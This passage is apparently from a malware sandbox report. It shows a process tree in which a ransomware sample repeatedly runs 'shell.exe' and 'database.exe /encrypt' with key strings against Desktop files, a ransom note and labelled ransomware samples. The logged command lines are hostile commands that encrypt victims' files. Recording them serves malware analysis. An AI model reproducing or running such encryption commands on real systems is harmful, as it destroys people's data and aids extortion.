                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Agent.gen-c258088499ef0bcd93fa23f726bef802a11fe8aa03b95262f827e0a7c01aa2c5.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Blocker.gen-bd8d1fb9b2ffb5690b84e32e5d6c794d42ec4ec753222478092776ea1e483991.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
